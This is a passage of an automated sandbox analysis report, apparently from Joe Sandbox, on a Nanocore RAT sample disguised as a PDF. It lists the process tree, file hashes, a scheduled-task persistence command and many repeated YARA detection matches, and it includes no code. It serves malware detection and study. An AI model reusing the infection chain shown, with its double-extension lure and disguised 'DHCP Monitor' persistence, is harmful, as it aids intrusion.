FindFirstFileExA, FindNextFileA, IsValidCodePage
              OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
              gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
              Language of compilation system | Country where language is spoken | Map
              English | United States |


              Target ID:0
              Start time:17:51:27
              Start date:03/02/2023
              Path:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              Imagebase:0x3d0000
              File size:1181640 bytes
              MD5 hash:3AC05BBE35293FBFD0DF49ECFB34C461
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:1
              Start time:17:51:39
              Start date:03/02/2023
              Path:C:\Windows\SysWOW64\wscript.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
              Imagebase:0xd10000
              File size:147456 bytes
              MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:6
              Start time:17:51:49
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 26%, ReversingLabs
              Reputation:low

              Target ID:10
              Start time:17:51:58
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x360000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              Reputation:high

              Target ID:11
              Start time:17:52:02
              Start date:03/02/2023
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
              Imagebase:0xef0000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:12
              Start time:17:52:02
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:13
              Start time:17:52:03
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0
              Imagebase:0x10000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high

              Target ID:14
              Start time:17:52:03
              Start date:03/02/2023
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
              Imagebase:0xef0000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:15
              Start time:17:52:04
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:16
              Start time:17:52:04
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:17
              Start time:17:52:06
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              Target ID:18
              Start time:17:52:07
              Start date:03/02/2023
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
              Imagebase:0x710000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Antivirus matches:
              • Detection: 0%, ReversingLabs

              Target ID:19
              Start time:17:52:07
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:20
              Start time:17:52:15
              Start date:03/02/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
              Imagebase:0x7ff6f21c0000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:21
              Start time:17:52:16
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              Target ID:22
              Start time:17:52:18
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x350000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
